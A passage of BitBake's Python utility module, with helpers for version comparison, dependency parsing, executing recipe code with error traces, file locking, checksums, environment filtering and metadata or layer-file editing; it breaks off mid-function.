""" BitBake Utility Functions """ # Copyright (C) 2004 Michael Lauer # # SPDX-License-Identifier: GPL-2.0-only # import re, fcntl, os, string, stat, shutil, time import sys import errno import logging import bb import bb.msg import multiprocessing import fcntl import importlib from importlib import machinery import itertools import subprocess import glob import fnmatch import traceback import errno import signal import ast import collections import copy from subprocess import getstatusoutput from contextlib import contextmanager from ctypes import cdll logger = logging.getLogger("BitBake.Util") python_extensions = importlib.machinery.all_suffixes() def clean_context(): return { "os": os, "bb": bb, "time": time, } def get_context(): return _context def set_context(ctx): _context = ctx # Context used in better_exec, eval _context = clean_context() class VersionStringException(Exception): """Exception raised when an invalid version specification is found""" def explode_version(s): r = [] alpha_regexp = re.compile(r'^([a-zA-Z]+)(.*)$') numeric_regexp = re.compile(r'^(\d+)(.*)$') while (s != ''): if s[0] in string.digits: m = numeric_regexp.match(s) r.append((0, int(m.group(1)))) s = m.group(2) continue if s[0] in string.ascii_letters: m = alpha_regexp.match(s) r.append((1, m.group(1))) s = m.group(2) continue if s[0] == '~': r.append((-1, s[0])) else: r.append((2, s[0])) s = s[1:] return r def split_version(s): """Split a version string into its constituent parts (PE, PV, PR)""" s = s.strip(" <>=") e = 0 if s.count(':'): e = int(s.split(":")[0]) s = s.split(":")[1] r = "" if s.count('-'): r = s.rsplit("-", 1)[1] s = s.rsplit("-", 1)[0] v = s return (e, v, r) def vercmp_part(a, b): va = explode_version(a) vb = explode_version(b) while True: if va == []: (oa, ca) = (0, None) else: (oa, ca) = va.pop(0) if vb == []: (ob, cb) = (0, None) else: (ob, cb) = vb.pop(0) if (oa, ca) == (0, None) and (ob, cb) == (0, None): return 0 if oa < ob: return -1 elif oa > ob: return 1 elif ca is None: return -1 elif cb is None: return 1 elif ca < cb: return -1 elif ca > cb: return 1 def vercmp(ta, tb): (ea, va, ra) = ta (eb, vb, rb) = tb r = int(ea or 0) - int(eb or 0) if (r == 0): r = vercmp_part(va, vb) if (r == 0): r = vercmp_part(ra, rb) return r def vercmp_string(a, b): ta = split_version(a) tb = split_version(b) return vercmp(ta, tb) def vercmp_string_op(a, b, op): """ Compare two versions and check if the specified comparison operator matches the result of the comparison. This function is fairly liberal about what operators it will accept since there are a variety of styles depending on the context. """ res = vercmp_string(a, b) if op in ('=', '=='): return res == 0 elif op == '<=': return res <= 0 elif op == '>=': return res >= 0 elif op in ('>', '>>'): return res > 0 elif op in ('<', '<<'): return res < 0 elif op == '!=': return res != 0 else: raise VersionStringException('Unsupported comparison operator "%s"' % op) def explode_deps(s): """ Take an RDEPENDS style string of format: "DEPEND1 (optional version) DEPEND2 (optional version) ..." and return a list of dependencies. Version information is ignored. """ r = [] l = s.split() flag = False for i in l: if i[0] == '(': flag = True #j = [] if not flag: r.append(i) #else: # j.append(i) if flag and i.endswith(')'): flag = False # Ignore version #r[-1] += ' ' + ' '.join(j) return r def explode_dep_versions2(s, *, sort=True): """ Take an RDEPENDS style string of format: "DEPEND1 (optional version) DEPEND2 (optional version) ..." and return a dictionary of dependencies and versions. """ r = collections.OrderedDict() l = s.replace(",", "").split() lastdep = None lastcmp = "" lastver = "" incmp = False inversion = False for i in l: if i[0] == '(': incmp = True i = i[1:].strip() if not i: continue if incmp: incmp = False inversion = True # This list is based on behavior and supported comparisons from deb, opkg and rpm. # # Even though =<, <<, ==, !=, =>, and >> may not be supported, # we list each possibly valid item. # The build system is responsible for validation of what it supports. if i.startswith(('<=', '=<', '<<', '==', '!=', '>=', '=>', '>>')): lastcmp = i[0:2] i = i[2:] elif i.startswith(('<', '>', '=')): lastcmp = i[0:1] i = i[1:] else: # This is an unsupported case! raise VersionStringException('Invalid version specification in "(%s" - invalid or missing operator' % i) lastcmp = (i or "") i = "" i.strip() if not i: continue if inversion: if i.endswith(')'): i = i[:-1] or "" inversion = False if lastver and i: lastver += " " if i: lastver += i if lastdep not in r: r[lastdep] = [] r[lastdep].append(lastcmp + " " + lastver) continue #if not inversion: lastdep = i lastver = "" lastcmp = "" if not (i in r and r[i]): r[lastdep] = [] if sort: r = collections.OrderedDict(sorted(r.items(), key=lambda x: x[0])) return r def explode_dep_versions(s): r = explode_dep_versions2(s) for d in r: if not r[d]: r[d] = None continue if len(r[d]) > 1: bb.warn("explode_dep_versions(): Item %s appeared in dependency string '%s' multiple times with different values. explode_dep_versions cannot cope with this." % (d, s)) r[d] = r[d][0] return r def join_deps(deps, commasep=True): """ Take the result from explode_dep_versions and generate a dependency string """ result = [] for dep in deps: if deps[dep]: if isinstance(deps[dep], list): for v in deps[dep]: result.append(dep + " (" + v + ")") else: result.append(dep + " (" + deps[dep] + ")") else: result.append(dep) if commasep: return ", ".join(result) else: return " ".join(result) def _print_trace(body, line): """ Print the Environment of a Text Body """ error = [] # print the environment of the method min_line = max(1, line-4) max_line = min(line + 4, len(body)) for i in range(min_line, max_line + 1): if line == i: error.append(' *** %.4d:%s' % (i, body[i-1].rstrip())) else: error.append(' %.4d:%s' % (i, body[i-1].rstrip())) return error def better_compile(text, file, realfile, mode = "exec", lineno = 0): """ A better compile method. This method will print the offending lines. """ try: cache = bb.methodpool.compile_cache(text) if cache: return cache # We can't add to the linenumbers for compile, we can pad to the correct number of blank lines though text2 = "\n" * int(lineno) + text code = compile(text2, realfile, mode) bb.methodpool.compile_cache_add(text, code) return code except Exception as e: error = [] # split the text into lines again body = text.split('\n') error.append("Error in compiling python function in %s, line %s:\n" % (realfile, e.lineno)) if hasattr(e, "lineno"): error.append("The code lines resulting in this error were:") # e.lineno: line's position in reaflile # lineno: function name's "position -1" in realfile # e.lineno - lineno: line's relative position in function error.extend(_print_trace(body, e.lineno - lineno)) else: error.append("The function causing this error was:") for line in body: error.append(line) error.append("%s: %s" % (e.__class__.__name__, str(e))) logger.error("\n".join(error)) e = bb.BBHandledException(e) raise e def _print_exception(t, value, tb, realfile, text, context): error = [] try: exception = traceback.format_exception_only(t, value) error.append('Error executing a python function in %s:\n' % realfile) # Strip 'us' from the stack (better_exec call) unless that was where the # error came from if tb.tb_next is not None: tb = tb.tb_next textarray = text.split('\n') linefailed = tb.tb_lineno tbextract = traceback.extract_tb(tb) tbformat = traceback.format_list(tbextract) error.append("The stack trace of python calls that resulted in this exception/failure was:") error.append("File: '%s', lineno: %s, function: %s" % (tbextract[0][0], tbextract[0][1], tbextract[0][2])) error.extend(_print_trace(textarray, linefailed)) # See if this is a function we constructed and has calls back into other functions in # "text". If so, try and improve the context of the error by diving down the trace level = 0 nexttb = tb.tb_next while nexttb is not None and (level+1) < len(tbextract): error.append("File: '%s', lineno: %s, function: %s" % (tbextract[level+1][0], tbextract[level+1][1], tbextract[level+1][2])) if tbextract[level][0] == tbextract[level+1][0] and tbextract[level+1][2] == tbextract[level][0]: # The code was possibly in the string we compiled ourselves error.extend(_print_trace(textarray, tbextract[level+1][1])) elif tbextract[level+1][0].startswith("/"): # The code looks like it might be in a file, try and load it try: with open(tbextract[level+1][0], "r") as f: text = f.readlines() error.extend(_print_trace(text, tbextract[level+1][1])) except: error.append(tbformat[level+1]) else: error.append(tbformat[level+1]) nexttb = tb.tb_next level = level + 1 error.append("Exception: %s" % ''.join(exception)) # If the exception is from spwaning a task, let's be helpful and display # the output (which hopefully includes stderr). if isinstance(value, subprocess.CalledProcessError) and value.output: error.append("Subprocess output:") error.append(value.output.decode("utf-8", errors="ignore")) finally: logger.error("\n".join(error)) def better_exec(code, context, text = None, realfile = "<code>", pythonexception=False): """ Similiar to better_compile, better_exec will print the lines that are responsible for the error. """ import bb.parse if not text: text = code if not hasattr(code, "co_filename"): code = better_compile(code, realfile, realfile) try: exec(code, get_context(), context) except (bb.BBHandledException, bb.parse.SkipRecipe, bb.build.FuncFailed, bb.data_smart.ExpansionError): # Error already shown so passthrough, no need for traceback raise except Exception as e: if pythonexception: raise (t, value, tb) = sys.exc_info() try: _print_exception(t, value, tb, realfile, text, context) except Exception as e: logger.error("Exception handler error: %s" % str(e)) e = bb.BBHandledException(e) raise e def simple_exec(code, context): exec(code, get_context(), context) def better_eval(source, locals, extraglobals = None): ctx = get_context() if extraglobals: ctx = copy.copy(ctx) for g in extraglobals: ctx[g] = extraglobals[g] return eval(source, ctx, locals) @contextmanager def fileslocked(files): """Context manager for locking and unlocking file locks.""" locks = [] if files: for lockfile in files: locks.append(bb.utils.lockfile(lockfile)) yield for lock in locks: bb.utils.unlockfile(lock) @contextmanager def timeout(seconds): def timeout_handler(signum, frame): pass original_handler = signal.signal(signal.SIGALRM, timeout_handler) try: signal.alarm(seconds) yield finally: signal.alarm(0) signal.signal(signal.SIGALRM, original_handler) def lockfile(name, shared=False, retry=True, block=False): """ Use the specified file as a lock file, return when the lock has been acquired. Returns a variable to pass to unlockfile(). Parameters: retry: True to re-try locking if it fails, False otherwise block: True to block until the lock succeeds, False otherwise The retry and block parameters are kind of equivalent unless you consider the possibility of sending a signal to the process to break out - at which point you want block=True rather than retry=True. """ dirname = os.path.dirname(name) mkdirhier(dirname) if not os.access(dirname, os.W_OK): logger.error("Unable to acquire lock '%s', directory is not writable", name) sys.exit(1) op = fcntl.LOCK_EX if shared: op = fcntl.LOCK_SH if not retry and not block: op = op | fcntl.LOCK_NB while True: # If we leave the lockfiles lying around there is no problem # but we should clean up after ourselves. This gives potential # for races though. To work around this, when we acquire the lock # we check the file we locked was still the lock file on disk. # by comparing inode numbers. If they don't match or the lockfile # no longer exists, we start again. # This implementation is unfair since the last person to request the # lock is the most likely to win it. try: lf = open(name, 'a+') fileno = lf.fileno() fcntl.flock(fileno, op) statinfo = os.fstat(fileno) if os.path.exists(lf.name): statinfo2 = os.stat(lf.name) if statinfo.st_ino == statinfo2.st_ino: return lf lf.close() except OSError as e: if e.errno == errno.EACCES: logger.error("Unable to acquire lock '%s', %s", e.strerror, name) sys.exit(1) try: lf.close() except Exception: pass pass if not retry: return None def unlockfile(lf): """ Unlock a file locked using lockfile() """ try: # If we had a shared lock, we need to promote to exclusive before # removing the lockfile. Attempt this, ignore failures. fcntl.flock(lf.fileno(), fcntl.LOCK_EX|fcntl.LOCK_NB) os.unlink(lf.name) except (IOError, OSError): pass fcntl.flock(lf.fileno(), fcntl.LOCK_UN) lf.close() def md5_file(filename): """ Return the hex string representation of the MD5 checksum of filename. """ import hashlib, mmap with open(filename, "rb") as f: m = hashlib.md5() try: with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm: for chunk in iter(lambda: mm.read(8192), b''): m.update(chunk) except ValueError: # You can't mmap() an empty file so silence this exception pass return m.hexdigest() def sha256_file(filename): """ Return the hex string representation of the 256-bit SHA checksum of filename. """ import hashlib s = hashlib.sha256() with open(filename, "rb") as f: for line in f: s.update(line) return s.hexdigest() def sha1_file(filename): """ Return the hex string representation of the SHA1 checksum of the filename """ import hashlib s = hashlib.sha1() with open(filename, "rb") as f: for line in f: s.update(line) return s.hexdigest() def preserved_envvars_exported(): """Variables which are taken from the environment and placed in and exported from the metadata""" return [ 'BB_TASKHASH', 'HOME', 'LOGNAME', 'PATH', 'PWD', 'SHELL', 'TERM', 'USER', 'LC_ALL', 'BBSERVER', ] def preserved_envvars(): """Variables which are taken from the environment and placed in the metadata""" v = [ 'BBPATH', 'BB_PRESERVE_ENV', 'BB_ENV_WHITELIST', 'BB_ENV_EXTRAWHITE', ] return v + preserved_envvars_exported() def filter_environment(good_vars): """ Create a pristine environment for bitbake. This will remove variables that are not known and may influence the build in a negative way. """ removed_vars = {} for key in list(os.environ): if key in good_vars: continue removed_vars[key] = os.environ[key] del os.environ[key] # If we spawn a python process, we need to have a UTF-8 locale, else python's file # access methods will use ascii. You can't change that mode once the interpreter is # started so we have to ensure a locale is set. Ideally we'd use C.UTF-8 but not all # distros support that and we need to set something. os.environ["LC_ALL"] = "en_US.UTF-8" if removed_vars: logger.debug(1, "Removed the following variables from the environment: %s", ", ".join(removed_vars.keys())) return removed_vars def approved_variables(): """ Determine and return the list of whitelisted variables which are approved to remain in the environment. """ if 'BB_PRESERVE_ENV' in os.environ: return os.environ.keys() approved = [] if 'BB_ENV_WHITELIST' in os.environ: approved = os.environ['BB_ENV_WHITELIST'].split() approved.extend(['BB_ENV_WHITELIST']) else: approved = preserved_envvars() if 'BB_ENV_EXTRAWHITE' in os.environ: approved.extend(os.environ['BB_ENV_EXTRAWHITE'].split()) if 'BB_ENV_EXTRAWHITE' not in approved: approved.extend(['BB_ENV_EXTRAWHITE']) return approved def clean_environment(): """ Clean up any spurious environment variables. This will remove any variables the user hasn't chosen to preserve. """ if 'BB_PRESERVE_ENV' not in os.environ: good_vars = approved_variables() return filter_environment(good_vars) return {} def empty_environment(): """ Remove all variables from the environment. """ for s in list(os.environ.keys()): os.unsetenv(s) del os.environ[s] def build_environment(d): """ Build an environment from all exported variables. """ import bb.data for var in bb.data.keys(d): export = d.getVarFlag(var, "export", False) if export: os.environ[var] = d.getVar(var) or "" def _check_unsafe_delete_path(path): """ Basic safeguard against recursively deleting something we shouldn't. If it returns True, the caller should raise an exception with an appropriate message. NOTE: This is NOT meant to be a security mechanism - just a guard against silly mistakes with potentially disastrous results. """ extra = '' # HOME might not be /home/something, so in case we can get it, check against it homedir = os.environ.get('HOME', '') if homedir: extra = '|%s' % homedir if re.match('(/|//|/home|/home/[^/]*%s)$' % extra, os.path.abspath(path)): return True return False def remove(path, recurse=False): """Equivalent to rm -f or rm -rf""" if not path: return if recurse: for name in glob.glob(path): if _check_unsafe_delete_path(path): raise Exception('bb.utils.remove: called with dangerous path "%s" and recurse=True, refusing to delete!' % path) # shutil.rmtree(name) would be ideal but its too slow subprocess.check_call(['rm', '-rf'] + glob.glob(path)) return for name in glob.glob(path): try: os.unlink(name) except OSError as exc: if exc.errno != errno.ENOENT: raise def prunedir(topdir): # Delete everything reachable from the directory named in 'topdir'. # CAUTION: This is dangerous! if _check_unsafe_delete_path(topdir): raise Exception('bb.utils.prunedir: called with dangerous path "%s", refusing to delete!' % topdir) remove(topdir, recurse=True) # # Could also use return re.compile("(%s)" % "|".join(map(re.escape, suffixes))).sub(lambda mo: "", var) # but thats possibly insane and suffixes is probably going to be small # def prune_suffix(var, suffixes, d): # See if var ends with any of the suffixes listed and # remove it if found for suffix in suffixes: if suffix and var.endswith(suffix): return var[:-len(suffix)] return var def mkdirhier(directory): """Create a directory like 'mkdir -p', but does not complain if directory already exists like os.makedirs """ try: os.makedirs(directory) except OSError as e: if e.errno != errno.EEXIST or not os.path.isdir(directory): raise e def movefile(src, dest, newmtime = None, sstat = None): """Moves a file from src to dest, preserving all permissions and attributes; mtime will be preserved even when moving across filesystems. Returns true on success and false on failure. Move is atomic. """ #print "movefile(" + src + "," + dest + "," + str(newmtime) + "," + str(sstat) + ")" try: if not sstat: sstat = os.lstat(src) except Exception as e: print("movefile: Stating source file failed...", e) return None destexists = 1 try: dstat = os.lstat(dest) except: dstat = os.lstat(os.path.dirname(dest)) destexists = 0 if destexists: if stat.S_ISLNK(dstat[stat.ST_MODE]): try: os.unlink(dest) destexists = 0 except Exception as e: pass if stat.S_ISLNK(sstat[stat.ST_MODE]): try: target = os.readlink(src) if destexists and not stat.S_ISDIR(dstat[stat.ST_MODE]): os.unlink(dest) os.symlink(target, dest) #os.lchown(dest,sstat[stat.ST_UID],sstat[stat.ST_GID]) os.unlink(src) return os.lstat(dest) except Exception as e: print("movefile: failed to properly create symlink:", dest, "->", target, e) return None renamefailed = 1 # os.rename needs to know the dest path ending with file name # so append the file name to a path only if it's a dir specified srcfname = os.path.basename(src) destpath = os.path.join(dest, srcfname) if os.path.isdir(dest) \ else dest if sstat[stat.ST_DEV] == dstat[stat.ST_DEV]: try: os.rename(src, destpath) renamefailed = 0 except Exception as e: if e[0] != errno.EXDEV: # Some random error. print("movefile: Failed to move", src, "to", dest, e) return None # Invalid cross-device-link 'bind' mounted or actually Cross-Device if renamefailed: didcopy = 0 if stat.S_ISREG(sstat[stat.ST_MODE]): try: # For safety copy then move it over. shutil.copyfile(src, destpath + "#new") os.rename(destpath + "#new", destpath) didcopy = 1 except Exception as e: print('movefile: copy', src, '->', dest, 'failed.', e) return None else: #we don't yet handle special, so we need to fall back to /bin/mv a = getstatusoutput("/bin/mv -f " + "'" + src + "' '" + dest + "'") if a[0] != 0: print("movefile: Failed to move special file:" + src + "' to '" + dest + "'", a) return None # failure try: if didcopy: os.lchown(destpath, sstat[stat.ST_UID], sstat[stat.ST_GID]) os.chmod(destpath, stat.S_IMODE(sstat[stat.ST_MODE])) # Sticky is reset on chown os.unlink(src) except Exception as e: print("movefile: Failed to chown/chmod/unlink", dest, e) return None if newmtime: os.utime(destpath, (newmtime, newmtime)) else: os.utime(destpath, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) newmtime = sstat[stat.ST_MTIME] return newmtime def copyfile(src, dest, newmtime = None, sstat = None): """ Copies a file from src to dest, preserving all permissions and attributes; mtime will be preserved even when moving across filesystems. Returns true on success and false on failure. """ #print "copyfile(" + src + "," + dest + "," + str(newmtime) + "," + str(sstat) + ")" try: if not sstat: sstat = os.lstat(src) except Exception as e: logger.warning("copyfile: stat of %s failed (%s)" % (src, e)) return False destexists = 1 try: dstat = os.lstat(dest) except: dstat = os.lstat(os.path.dirname(dest)) destexists = 0 if destexists: if stat.S_ISLNK(dstat[stat.ST_MODE]): try: os.unlink(dest) destexists = 0 except Exception as e: pass if stat.S_ISLNK(sstat[stat.ST_MODE]): try: target = os.readlink(src) if destexists and not stat.S_ISDIR(dstat[stat.ST_MODE]): os.unlink(dest) os.symlink(target, dest) #os.lchown(dest,sstat[stat.ST_UID],sstat[stat.ST_GID]) return os.lstat(dest) except Exception as e: logger.warning("copyfile: failed to create symlink %s to %s (%s)" % (dest, target, e)) return False if stat.S_ISREG(sstat[stat.ST_MODE]): try: srcchown = False if not os.access(src, os.R_OK): # Make sure we can read it srcchown = True os.chmod(src, sstat[stat.ST_MODE] | stat.S_IRUSR) # For safety copy then move it over. shutil.copyfile(src, dest + "#new") os.rename(dest + "#new", dest) except Exception as e: logger.warning("copyfile: copy %s to %s failed (%s)" % (src, dest, e)) return False finally: if srcchown: os.chmod(src, sstat[stat.ST_MODE]) os.utime(src, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) else: #we don't yet handle special, so we need to fall back to /bin/mv a = getstatusoutput("/bin/cp -f " + "'" + src + "' '" + dest + "'") if a[0] != 0: logger.warning("copyfile: failed to copy special file %s to %s (%s)" % (src, dest, a)) return False # failure try: os.lchown(dest, sstat[stat.ST_UID], sstat[stat.ST_GID]) os.chmod(dest, stat.S_IMODE(sstat[stat.ST_MODE])) # Sticky is reset on chown except Exception as e: logger.warning("copyfile: failed to chown/chmod %s (%s)" % (dest, e)) return False if newmtime: os.utime(dest, (newmtime, newmtime)) else: os.utime(dest, (sstat[stat.ST_ATIME], sstat[stat.ST_MTIME])) newmtime = sstat[stat.ST_MTIME] return newmtime def break_hardlinks(src, sstat = None): """ Ensures src is the only hardlink to this file. Other hardlinks, if any, are not affected (other than in their st_nlink value, of course). Returns true on success and false on failure. """ try: if not sstat: sstat = os.lstat(src) except Exception as e: logger.warning("break_hardlinks: stat of %s failed (%s)" % (src, e)) return False if sstat[stat.ST_NLINK] == 1: return True return copyfile(src, src, sstat=sstat) def which(path, item, direction = 0, history = False, executable=False): """ Locate `item` in the list of paths `path` (colon separated string like $PATH). If `direction` is non-zero then the list is reversed. If `history` is True then the list of candidates also returned as result,history. If `executable` is True then the candidate has to be an executable file, otherwise the candidate simply has to exist. """ if executable: is_candidate = lambda p: os.path.isfile(p) and os.access(p, os.X_OK) else: is_candidate = lambda p: os.path.exists(p) hist = [] paths = (path or "").split(':') if direction != 0: paths.reverse() for p in paths: next = os.path.join(p, item) hist.append(next) if is_candidate(next): if not os.path.isabs(next): next = os.path.abspath(next) if history: return next, hist return next if history: return "", hist return "" def to_boolean(string, default=None): if not string: return default normalized = string.lower() if normalized in ("y", "yes", "1", "true"): return True elif normalized in ("n", "no", "0", "false"): return False else: raise ValueError("Invalid value for to_boolean: %s" % string) def contains(variable, checkvalues, truevalue, falsevalue, d): """Check if a variable contains all the values specified. Arguments: variable -- the variable name. This will be fetched and expanded (using d.getVar(variable)) and then split into a set(). checkvalues -- if this is a string it is split on whitespace into a set(), otherwise coerced directly into a set(). truevalue -- the value to return if checkvalues is a subset of variable. falsevalue -- the value to return if variable is empty or if checkvalues is not a subset of variable. d -- the data store. """ val = d.getVar(variable) if not val: return falsevalue val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) if checkvalues.issubset(val): return truevalue return falsevalue def contains_any(variable, checkvalues, truevalue, falsevalue, d): val = d.getVar(variable) if not val: return falsevalue val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) if checkvalues & val: return truevalue return falsevalue def filter(variable, checkvalues, d): """Return all words in the variable that are present in the checkvalues. Arguments: variable -- the variable name. This will be fetched and expanded (using d.getVar(variable)) and then split into a set(). checkvalues -- if this is a string it is split on whitespace into a set(), otherwise coerced directly into a set(). d -- the data store. """ val = d.getVar(variable) if not val: return '' val = set(val.split()) if isinstance(checkvalues, str): checkvalues = set(checkvalues.split()) else: checkvalues = set(checkvalues) return ' '.join(sorted(checkvalues & val)) def cpu_count(): return multiprocessing.cpu_count() def nonblockingfd(fd): fcntl.fcntl(fd, fcntl.F_SETFL, fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK) def process_profilelog(fn, pout = None): # Either call with a list of filenames and set pout or a filename and optionally pout. if not pout: pout = fn + '.processed' pout = open(pout, 'w') import pstats if isinstance(fn, list): p = pstats.Stats(*fn, stream=pout) else: p = pstats.Stats(fn, stream=pout) p.sort_stats('time') p.print_stats() p.print_callers() p.sort_stats('cumulative') p.print_stats() pout.flush() pout.close() # # Was present to work around multiprocessing pool bugs in python < 2.7.3 # def multiprocessingpool(*args, **kwargs): import multiprocessing.pool #import multiprocessing.util #multiprocessing.util.log_to_stderr(10) # Deal with a multiprocessing bug where signals to the processes would be delayed until the work # completes. Putting in a timeout means the signals (like SIGINT/SIGTERM) get processed. def wrapper(func): def wrap(self, timeout=None): return func(self, timeout=timeout if timeout is not None else 1e100) return wrap multiprocessing.pool.IMapIterator.next = wrapper(multiprocessing.pool.IMapIterator.next) return multiprocessing.Pool(*args, **kwargs) def exec_flat_python_func(func, *args, **kwargs): """Execute a flat python function (defined with def funcname(args):...)""" # Prepare a small piece of python code which calls the requested function # To do this we need to prepare two things - a set of variables we can use to pass # the values of arguments into the calling function, and the list of arguments for # the function being called context = {} funcargs = [] # Handle unnamed arguments aidx = 1 for arg in args: argname = 'arg_%s' % aidx context[argname] = arg funcargs.append(argname) aidx += 1 # Handle keyword arguments context.update(kwargs) funcargs.extend(['%s=%s' % (arg, arg) for arg in kwargs.keys()]) code = 'retval = %s(%s)' % (func, ', '.join(funcargs)) comp = bb.utils.better_compile(code, '<string>', '<string>') bb.utils.better_exec(comp, context, code, '<string>') return context['retval'] def edit_metadata(meta_lines, variables, varfunc, match_overrides=False): """Edit lines from a recipe or config file and modify one or more specified variable values set in the file using a specified callback function. Lines are expected to have trailing newlines. Parameters: meta_lines: lines from the file; can be a list or an iterable (e.g. file pointer) variables: a list of variable names to look for. Functions may also be specified, but must be specified with '()' at the end of the name. Note that the function doesn't have any intrinsic understanding of _append, _prepend, _remove, or overrides, so these are considered as part of the name. These values go into a regular expression, so regular expression syntax is allowed. varfunc: callback function called for every variable matching one of the entries in the variables parameter. The function should take four arguments: varname: name of variable matched origvalue: current value in file op: the operator (e.g. '+=') newlines: list of lines up to this point. You can use this to prepend lines before this variable setting if you wish. and should return a four-element tuple: newvalue: new value to substitute in, or None to drop the variable setting entirely. (If the removal results in two consecutive blank lines, one of the blank lines will also be dropped). newop: the operator to use - if you specify None here, the original operation will be used. indent: number of spaces to indent multi-line entries, or -1 to indent up to the level of the assignment and opening quote, or a string to use as the indent. minbreak: True to allow the first element of a multi-line value to continue on the same line as the assignment, False to indent before the first element. To clarify, if you wish not to change the value, then you would return like this: return origvalue, None, 0, True match_overrides: True to match items with _overrides on the end, False otherwise Returns a tuple: updated: True if changes were made, False otherwise. newlines: Lines after processing """ var_res = {} if match_overrides: override_re = r'(_[a-zA-Z0-9-_$(){}]+)?' else: override_re = '' for var in variables: if var.endswith('()'): var_res[var] = re.compile(r'^(%s%s)[ \\t]*\([ \\t]*\)[ \\t]*{' % (var[:-2].rstrip(), override_re)) else: var_res[var] = re.compile(r'^(%s%s)[ \\t]*[?+:.]*=[+.]*[ \\t]*(["\'])' % (var, override_re)) updated = False varset_start = '' varlines = [] newlines = [] in_var = None full_value = '' var_end = '' def handle_var_end(): prerun_newlines = newlines[:] op = varset_start[len(in_var):].strip() (newvalue, newop, indent, minbreak) = varfunc(in_var, full_value, op, newlines) changed = (prerun_newlines != newlines) if newvalue is None: # Drop the value return True elif newvalue != full_value or (newop not in [None, op]): if newop not in [None, op]: # Callback changed the operator varset_new = "%s %s" % (in_var, newop) else: varset_new = varset_start if isinstance(indent, int): if indent == -1: indentspc = ' ' * (len(varset_new) + 2) else: indentspc = ' ' * indent else: indentspc = indent if in_var.endswith('()'): # A function definition if isinstance(newvalue, list): newlines.append('%s {\n%s%s\n}\n' % (varset_new, indentspc, ('\n%s' % indentspc).join(newvalue))) else: if not newvalue.startswith('\n'): newvalue = '\n' + newvalue if not newvalue.endswith('\n'): newvalue = newvalue + '\n' newlines.append('%s {%s}\n' % (varset_new, newvalue)) else: # Normal variable if isinstance(newvalue, list): if not newvalue: # Empty list -> empty string newlines.append('%s ""\n' % varset_new) elif minbreak: # First item on first line if len(newvalue) == 1: newlines.append('%s "%s"\n' % (varset_new, newvalue[0])) else: newlines.append('%s "%s \\\n' % (varset_new, newvalue[0])) for item in newvalue[1:]: newlines.append('%s%s \\\n' % (indentspc, item)) newlines.append('%s"\n' % indentspc) else: # No item on first line newlines.append('%s " \\\n' % varset_new) for item in newvalue: newlines.append('%s%s \\\n' % (indentspc, item)) newlines.append('%s"\n' % indentspc) else: newlines.append('%s "%s"\n' % (varset_new, newvalue)) return True else: # Put the old lines back where they were newlines.extend(varlines) # If newlines was touched by the function, we'll need to return True return changed checkspc = False for line in meta_lines: if in_var: value = line.rstrip() varlines.append(line) if in_var.endswith('()'): full_value += '\n' + value else: full_value += value[:-1] if value.endswith(var_end): if in_var.endswith('()'): if full_value.count('{') - full_value.count('}') >= 0: continue full_value = full_value[:-1] if handle_var_end(): updated = True checkspc = True in_var = None else: skip = False for (varname, var_re) in var_res.items(): res = var_re.match(line) if res: isfunc = varname.endswith('()') if isfunc: splitvalue = line.split('{', 1) var_end = '}' else: var_end = res.groups()[-1] splitvalue = line.split(var_end, 1) varset_start = splitvalue[0].rstrip() value = splitvalue[1].rstrip() if not isfunc and value.endswith('\\'): value = value[:-1] full_value = value varlines = [line] in_var = res.group(1) if isfunc: in_var += '()' if value.endswith(var_end): full_value = full_value[:-1] if handle_var_end(): updated = True checkspc = True in_var = None skip = True break if not skip: if checkspc: checkspc = False if newlines and newlines[-1] == '\n' and line == '\n': # Squash blank line if there are two consecutive blanks after a removal continue newlines.append(line) return (updated, newlines) def edit_metadata_file(meta_file, variables, varfunc): """Edit a recipe or config file and modify one or more specified variable values set in the file using a specified callback function. The file is only written to if the value(s) actually change. This is basically the file version of edit_metadata(), see that function's description for parameter/usage information. Returns True if the file was written to, False otherwise. """ with open(meta_file, 'r') as f: (updated, newlines) = edit_metadata(f, variables, varfunc) if updated: with open(meta_file, 'w') as f: f.writelines(newlines) return updated def edit_bblayers_conf(bblayers_conf, add, remove, edit_cb=None): """Edit bblayers.conf, adding and/or removing layers Parameters: bblayers_conf: path to bblayers.conf file to edit add: layer path (or list of layer paths) to add; None or empty list to add nothing remove: layer path (or list of layer paths) to remove; None or empty list to remove nothing edit_cb: optional callback function that will be called after processing adds/removes once per existing entry. Returns a tuple: notadded: list of layers specified to be added but weren't (because they were already in the list) notremoved: list of layers that were specified to be removed but weren't (because they weren't in the list) """ import fnmatch def remove_trailing_sep(pth): if pth and pth[-1] == os.sep: pth = pth[:-1] return pth approved = bb.utils.approved_variables() def canonicalise_path(pth): pth = remove_trailing_sep(pth) if 'HOME' in approved and '~' in pth: pth = os.path.expanduser(pth) return pth def layerlist_param(value): if not value: return [] elif isinstance(value, list): return [remove_trailing_sep(x) for x in value] else: return [remove_trailing_sep(value)] addlayers = layerlist_param(add) removelayers = layerlist_param(remove) # Need to use a list here because we can't set non-local variables from a callback in python 2.x bblayercalls = [] removed = [] plusequals = False orig_bblayers = [] def handle_bblayers_firstpass(varname, origvalue, op, newlines): bblayercalls.append(op) if op == '=': del orig_bblayers[:] orig_bblayers.extend([canonicalise_path(x) for x in origvalue.split()]) return (origvalue, None, 2, False) def handle_bblayers(varname, origvalue, op, newlines): updated = False bblayers = [remove_trailing_sep(x) for x in origvalue.split()] if removelayers: for removelayer in removelayers: for layer in bblayers: if fnmatch.fnmatch(canonicalise_path(layer), canonicalise_path(removelayer)): updated = True bblayers.remove(layer) removed.append(removelayer) break if addlayers and not plusequals: for addlayer in addlayers: if addlayer not in bblayers: updated = True bblayers.append(addlayer) del addlayers[:] if edit_cb: newlist = [] for layer in bblayers: res = edit_cb(layer, canonicalise_path(layer)) if res != layer: newlist.append(res) updated = True else: newlist.append(layer) bblayers = newlist if updated: if op == '+=' and not bblayers: bblayers = None return (bblayers, None, 2, False) else: return (origvalue, None, 2, False) with open(bblayers_conf, 'r') as f: (_, newlines) = edit_metadata(f, ['BBLAYERS'], handle_bblayers_firstpass) if not bblayercalls: raise Exception('Unable to find BBLAYERS in %s' % bblayers_conf) # Try to do the "smart" thing depending on how the user has laid out # their bblayers.conf file if 